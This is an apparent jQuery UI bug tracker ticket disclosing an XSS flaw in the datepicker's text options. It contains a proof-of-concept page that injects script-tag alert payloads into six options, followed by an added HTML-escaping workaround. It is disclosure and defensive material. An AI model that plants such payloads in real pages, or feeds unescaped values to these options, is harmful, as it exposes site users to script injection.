Opened 9 months ago

#15284 new bug

XSS Vulnerability on text options of jQuery UI datepicker

Reported by: andycyork
Owned by:
Priority: minor
Milestone: none
Component: ui.datepicker
Version: 1.12.1
Keywords:
Cc:
Blocked by:
Blocking:

Description

Similar to https://github.com/jquery/api.jqueryui.com/issues/281, but applies to the datepicker.

To recreate:

Create a new HTML page.

Inject this content into the new page:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>XSS in options of datepicker</title>

  <script src="https://code.jquery.com/jquery-3.3.1.js"></script>
  <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
  <link rel="stylesheet" type="text/css" href="https://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
  <script>
    $(document).ready(function () {
      // Every text option below carries markup to show that it is rendered as HTML.
      $("#datepicker").datepicker({
        showButtonPanel: true,
        showOn: "both",
        closeText: '<script>alert("closeText XSS")<\/script>',
        currentText: '<script>alert("currentText XSS")<\/script>',
        prevText: '<script>alert("prevText XSS")<\/script>',
        nextText: '<script>alert("nextText XSS")<\/script>',
        buttonText: '<script>alert("buttonText XSS")<\/script>',
        appendText: '<script>alert("appendText XSS")<\/script>'
      });
    });
  </script>
</head>
<body>
  <p>Date: <input type="text" id="datepicker"></p>
</body>
</html>


On load, alerts are shown for appendText & buttonText.
After clicking the input control, alerts are shown for closeText, currentText, prevText & nextText.

The scripted alerts should not be shown - an attacker can take advantage of injecting malicious XSS content into a website.
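
A defensive workaround for the behaviour reported above, as an added example that is not part of the original ticket or jQuery UI's own code: HTML-escape the six text options before they reach the widget. `escapeHtml` and `safeDatepickerOptions` are hypothetical helper names, and the sample options are constructed.

```javascript
// The six text options the ticket shows being rendered as HTML.
const DATEPICKER_TEXT_OPTIONS = [
  "closeText", "currentText", "prevText",
  "nextText", "buttonText", "appendText"
];

const HTML_ENTITIES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#39;"
};

// Encode the characters that can open a tag, start an entity,
// or break out of a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Return a copy of `options` in which every text option that is set has been
// escaped. Non-text options and the caller's object are left untouched.
function safeDatepickerOptions(options) {
  const out = Object.assign({}, options);
  for (const name of DATEPICKER_TEXT_OPTIONS) {
    if (out[name] !== undefined && out[name] !== null) {
      out[name] = escapeHtml(out[name]);
    }
  }
  return out;
}

// Constructed sample: option values that originate outside the application,
// for example user-editable labels or translations.
const untrusted = {
  showButtonPanel: true,
  showOn: "both",
  closeText: '<script>alert("closeText XSS")<\/script>',
  appendText: "(yyyy-mm-dd) & 'local'"
};

const hardened = safeDatepickerOptions(untrusted);
// In the page: $("#datepicker").datepicker(hardened);
```

Apply the same escaping when these options are changed later through the widget's `option` setter. If the widget version in use already treats these options as plain text, escaping here would display the entities literally.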

Change History (0)
